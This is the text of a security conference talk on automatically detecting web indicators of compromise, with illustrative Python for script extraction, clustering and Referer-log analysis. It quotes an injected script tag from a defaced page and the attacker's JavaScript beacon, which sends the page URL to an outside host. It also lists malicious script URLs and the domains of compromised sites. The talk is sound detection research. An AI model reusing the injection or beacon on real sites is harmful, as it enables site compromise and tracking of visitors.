automatic extraction of indicators of compromise for web applications (ruhrsec 2016)

Automatic Extraction of Indicators of Compromise for Web Apps

Dr.-Ing. Marco Balduzzi (with D. Balzarotti and O. Catakoglu @ WWW'16)

29th April 2016, RuhrSec, Bochum

Who am I?

Sr. Research Scientist @ Trend Micro

Forward-Looking Threat Research (FTR) team

M.Sc. + Ph.D.

UniBG + iSecLab@EURECOM

Hackish and open-source enthusiast since 2002

Established presence in international conferences and committees

Indicators of Compromise (IOCs)

Used in incident response and computer forensics

Forensic artifacts indicating that a system has been compromised or infected with malware

For example

Presence in Windows Registry

File with a specific MD5 hash in a temporary directory

Unusual outbound network traffic

Log-in irregularities and failures

Topic of presentation

Extend the concept of IOCs to Web Applications

(& automatically detect them!)

A simple observation

When compromising a web application, attackers often rely on external content / accessory scripts

These are not necessarily malicious per se

Popular JavaScript libraries, e.g. jQuery

Beautifiers that control the look and feel of the page, e.g. matrix-style background

Scripts that implement reusable functions, e.g. browser fingerprinting

Their innocuous form makes them “highly resilient” to traditional detection systems (scanners)

BUT…

Their presence can be used to precisely pinpoint compromised or harmful pages

(a Web Indicator of Compromise)

Example: r57 hacking group

...
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html;charset=windows-1252">
<title>4Ri3 60ndr0n9 was here </title>
<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js> </SCRIPT>
...

http://r57.gen.tr/yazciz/ciz.js

Content of http://r57.gen.tr/yazciz/ciz.js:

a=new/**/Image();a.src='http://www.r57.gen.tr/r00t/yaz.php?a='+ escape(location.href);

How do we know that a script is used in a malicious context, i.e. that it “is a valid IOC”?

Data Collection

High-interaction web honeypot [1]

[1] Canali, D., and Balzarotti, D. Behind the scenes of online attacks: an analysis of exploitation behaviors on the web.

Extraction of Candidates

Automatically extract candidates from files uploaded and modified by attackers

Focus on JavaScript URLs

Can be applied to other resource types

Normally benign!

E.g., a script that blocks the mouse right-click, used by attackers to prevent page inspection

Content agnostic (impossible to tell benign from malicious use by looking at the script alone)

Need to extend the analysis to the context
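
The extraction step above can be sketched in a few lines. This is only an illustration under stated assumptions, not the authors' tooling: it assumes each uploaded or modified file is available as an HTML string, and the names ScriptSrcExtractor and extract_candidates are hypothetical. It collects the URLs of externally referenced JavaScript files, which then become candidate indicators.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class ScriptSrcExtractor(HTMLParser):
    """Collects the src attribute of every <script> tag in a page."""

    def __init__(self, base_url=""):
        super().__init__()
        self.base_url = base_url
        self.urls = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names,
        # so <SCRIPT SRC=...> is matched as well.
        if tag != "script":
            return
        for name, value in attrs:
            if name == "src" and value:
                # Resolve relative references against the page URL, if known.
                self.urls.append(urljoin(self.base_url, value.strip()))


def extract_candidates(html, base_url=""):
    """Return the distinct external script URLs of a page, in order of appearance."""
    parser = ScriptSrcExtractor(base_url)
    parser.feed(html)
    parser.close()
    return list(dict.fromkeys(parser.urls))


if __name__ == "__main__":
    page = (
        "<head><title>4Ri3 60ndr0n9 was here </title>"
        "<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js> </SCRIPT></head>"
    )
    print(extract_candidates(page))
```

Inline scripts have no src attribute and are skipped, which matches the "inline code" evasion listed under Limitations.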

Searching the Web for Indicators

Public web pages including references to our indicators

Google did not help :(

Only indexes the content (intext:)

Meanpath.com

HTML/JS source-code support

Coverage of 200 million websites

Compromised vs. Benign

Verify that a candidate URL is a valid Indicator

Set of features:

Page Similarity

Maliciousness

Anomalous Origin

Component Popularity

Security Forums

Experiments

Training data: Jan 2015 → April 2015

375 unique candidates (out of a total of 2,765)

Population of 1 to 202 (manual vs automated attacks)

Clustering: unsupervised learning (k-means)

Weka framework

3 cluster categories: malicious, benign, undecided

Live experiment: May 2015 → August 2015 (4 months)

Automated detection via analysis framework
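
The clustering step named above can be illustrated with a plain-Python k-means. The slides state that Weka was used; the code below is a stand-in for illustration, not the authors' setup. The two-dimensional feature vectors and the initial centroids are invented, and the function names are hypothetical. Initial centroids are passed in explicitly so that the run is deterministic.

```python
def squared_distance(a, b):
    """Squared Euclidean distance between two equal-length vectors."""
    return sum((x - y) ** 2 for x, y in zip(a, b))


def kmeans(points, initial_centroids, max_iterations=100):
    """Lloyd's algorithm: alternate assignment and centroid update until stable."""
    centroids = [tuple(c) for c in initial_centroids]
    assignment = None
    for _ in range(max_iterations):
        # Assignment step: each point goes to its nearest centroid.
        new_assignment = [
            min(range(len(centroids)),
                key=lambda c: squared_distance(p, centroids[c]))
            for p in points
        ]
        if new_assignment == assignment:
            break  # converged: no point changed cluster
        assignment = new_assignment
        # Update step: move each centroid to the mean of its members.
        for c in range(len(centroids)):
            members = [p for p, a in zip(points, assignment) if a == c]
            if members:
                centroids[c] = tuple(
                    sum(col) / len(members) for col in zip(*members)
                )
    return centroids, assignment


if __name__ == "__main__":
    # Hypothetical feature vectors, one per candidate URL.
    candidates = [(0.9, 0.8), (1.0, 0.9), (0.1, 0.0),
                  (0.0, 0.1), (0.5, 0.5), (0.45, 0.55)]
    start = [(1.0, 1.0), (0.0, 0.0), (0.5, 0.5)]
    centroids, assignment = kmeans(candidates, start)
    print(assignment)
```

With three clusters, each resulting group would still need to be labeled (malicious, benign, undecided) by inspecting its members; k-means itself assigns no meaning to a cluster.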

Live Experiment

303 unique candidates (2.5/day)

Automatically processed and assigned to the closest cluster

22 Benign indicators

96 Malicious indicators

90% were previously unknown or misclassified

¼ of the IOCs implement visual effects: moving text, snow

185 insufficient information (rare scripts)
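
Assigning a new candidate to the closest cluster, as described above, amounts to a nearest-centroid lookup. A minimal sketch, assuming the trained centroids are kept in a dictionary keyed by cluster label; the centroid values and the two-dimensional feature space are invented for illustration.

```python
import math


def closest_cluster(features, centroids):
    """Return the label of the centroid nearest to the feature vector."""
    return min(centroids, key=lambda label: math.dist(features, centroids[label]))


if __name__ == "__main__":
    # Hypothetical centroids obtained from the training phase.
    trained = {
        "malicious": (0.9, 0.8),
        "benign": (0.1, 0.1),
        "undecided": (0.5, 0.5),
    }
    print(closest_cluster((0.8, 0.9), trained))
```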

High Lifetime of Malicious Indicators

Use of trustworthy code-repositories

10% of the IOCs were hosted on Google Drive/Code!

1 was online for over 2 years!

Last month: used in dozens of defaced websites and drive-by attacks

Web Shells

Often deployed by attackers and hidden in defaced websites

Cases of password-protected logins [1]

Flagged as valid indicator

Cases of the r57shell script: feedback of defaced domains

[1] http://www.lionsclubmalviyanagar.com and http://www.wartisan.com

Phishing

Common habit

Webmail portals of AOL and Yahoo

Phishing pages reuse the original JS files, still hosted on the authoritative domain [1]

IOC included in pages hosted on different domains

Websites compromised by the same group [2]

Correctly classified as malicious indicator

[1] http://snsstatic.aolcdn.com/sns.v14r8/js/fs.js

[2] http://www.ucylojistik.com/ and http://fernandanunes.com/

VisAdd Adware Campaign

http://4x3zy4qll8bu4n1j.netdnassl.com/res/helper.min.js

Installed on defaced webpages

TDS for affiliate programs

A.Visadd.com malware

Loads the same JS at client-side

600+ new infected users per day

Fake Charity Program

http://static.donationtools.org/widgets/FoxyLyrics/widget.js

Loaded via BHO in IE

Vittalia and BrowseFox malware

594 new infections per day

Mailers

Compromised sites [1] → SPAM mailing server

Alternative to bulletproof hosting services (BHS) and botnet-infected machines

Use of Pro Mailer V2: PHP mailer

Copies of jQuery hosted on Google and Tumblr

Unmodified copies of popular libraries. Very likely classified as benign by traditional scanners

Malicious use detected.

[1] http://www.senzadistanza.it/ and http://www.hprgroup.biz/

Limitations

Our approach relies on the attacker's deployment strategy and is content agnostic

Evasion techniques:

Inline code

One-time generated URLs

Conclusions

Introduced the concept of Web IOCs

Leveraged a honeypot for real-time identification

Benign content → undetected by traditional scanners

Use 'HTTP Referer' to discover compromised pages

By the same hacking group?
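
The Referer idea above can be sketched as a log-analysis step. This is an assumption-laden illustration: it presumes access to the web server logs of the host serving the indicator script, in the Apache/nginx "combined" format, and the function name referring_pages is hypothetical. Every page that loads the script reveals its own URL in the Referer header of the request.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Combined log format:
# host ident user [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_LINE = re.compile(
    r'"(?:GET|HEAD|POST) (?P<path>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)


def referring_pages(log_lines, indicator_path):
    """Group the pages that requested the indicator script by referring host."""
    pages_by_host = defaultdict(set)
    for line in log_lines:
        match = LOG_LINE.search(line)
        if not match:
            continue
        # Ignore query strings when comparing the requested path.
        if urlsplit(match.group("path")).path != indicator_path:
            continue
        referer = match.group("referer")
        host = urlsplit(referer).hostname
        if host:  # skips "-" (no Referer sent) and malformed values
            pages_by_host[host].add(referer)
    return dict(pages_by_host)


if __name__ == "__main__":
    # Invented log lines using documentation-only addresses and domains.
    sample = [
        '203.0.113.5 - - [01/May/2015:10:00:00 +0000] "GET /yazciz/ciz.js HTTP/1.1" '
        '200 512 "http://defaced.example/index.html" "Mozilla/5.0"',
        '203.0.113.6 - - [01/May/2015:10:01:00 +0000] "GET /yazciz/ciz.js HTTP/1.1" '
        '200 512 "-" "curl/7.0"',
    ]
    print(referring_pages(sample, "/yazciz/ciz.js"))
```

Pages that reference the same indicator are candidates for having been compromised by the same group, which still has to be confirmed by other means.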

Thank you!

Dr.-Ing. Marco Balduzzi

@embyte
